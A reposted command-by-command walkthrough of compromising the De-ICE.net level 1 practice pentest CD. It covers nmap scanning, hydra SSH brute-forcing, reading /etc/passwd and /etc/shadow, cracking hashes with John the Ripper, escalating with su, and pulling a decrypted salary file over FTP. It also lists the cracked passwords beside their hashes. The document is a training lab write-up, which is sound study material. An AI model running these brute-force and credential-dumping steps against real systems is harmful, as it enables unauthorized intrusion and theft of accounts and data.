HOWTO : De-ICE.net v1.0 (1.100) {Level 1 - Disk 1}

*** Do NOT attack any computer or network without authorization or you may put into jail. ***



Credit to : g0tmi1k



This is g0tmi1k's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.



The original post at here



Links



Watch video on-line

Download video



What is this?



This is my walk though of how I broke into the De-ICE.net network, level 1, disk 1.



The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.



What do I need?



BackTrack 4 (Final)

de-ice.net-1.100-1.0.iso (MD5: a3341316ca9860b3a0acb06bdc58bbc1)

Dictionary(s)



Software

Name: De-ICE.net

Version: 1.0 (Level 1 - Disk 1 - IP Address: 1.100)

Home Page: http://www.de-ice.net or http://heorot.net/livecds/



Download Link:

http://www.mediafire.com/?bfo9b21g2m69tb6

http://heorot.net/instruction/tutorials/iso/de-ice.net-1.100-1.1.iso



Forums/Support: http://forums.heorot.net andhttp://forums.heorot.net/viewtopic.php?f=16&t=13

WiKi/Support: http://de-ice.net/hackerpedia/index.php/De-ICE.net_PenTest_Disks



Commands



nmap -n 192.168.1.1-255



nmap -n -sS -sV -O 192.168.1.100



firefox 192.168.1.100



[+]kate -> make list of possible usernames. Save. Filename: usernames

// lastF, fLast



hydra 192.168.1.100 ssh2 -L /root/usernames -p password -e s



ssh bbanter@192.168.1.100

// "Yes" if quiz about trusting authenticity. Password: bbanter



cd /etc/



cat passwd



[+]kate -> Update usernames. Save.



cat group



exit



cd /root/tools/dictionary/



cat common-1 common-2 common-3 common-4 wordlist.txt >> /root/passwords



hydra 192.168.1.100 ssh2 -V -l aadams -P /root/passwords



ssh aadams@192.168.1.100

// Password: nostradamus



cd /etc/



sudo cat shadow

// Password: nostradamus



[+]kate -> New -> Paste -> Save. Filename: shadow



exit



john



./john --rules --wordlist=/root/passwords --users=root /root/shadow

// Password: tarot



ssh aadams@192.168.1.100

// Password: nostradamus



su

// Password: tarot



ls -a



cd ..



ls -a



cd ftp

/



ls -a



cd incoming/



ls -a



openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary.csv -k tarot



cd /etc/



vi vsftpd.conf

// edit (by pressing i) vsftpd.conf to have a '#' in front of 'listen=YES' (last line). Then save it (:w), and exit (:quit)



modprobe capability



exit



exit



ftp 192.168.1.100

// User: root. Password: tarot



ls -a



cd ..



ls -a



cd home



ls -a



cd ftp



ls -a



cd incoming



ls -a



get salary.csv



cd /pentest/passwords/jtr



ls



mv salary.csv ~



[+]kate -> salary.csv



// GAME OVER



----------------------------------------------------------------------------------------------------

Users

root:tarot = root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::

aadams:nostradamus = aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::

bbanter:bbanter = bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::

ccoffee:hierophant = ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::

----------------------------------------------------------------------------------------------------





Notes



Dictionaries: http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html



That's all! See you.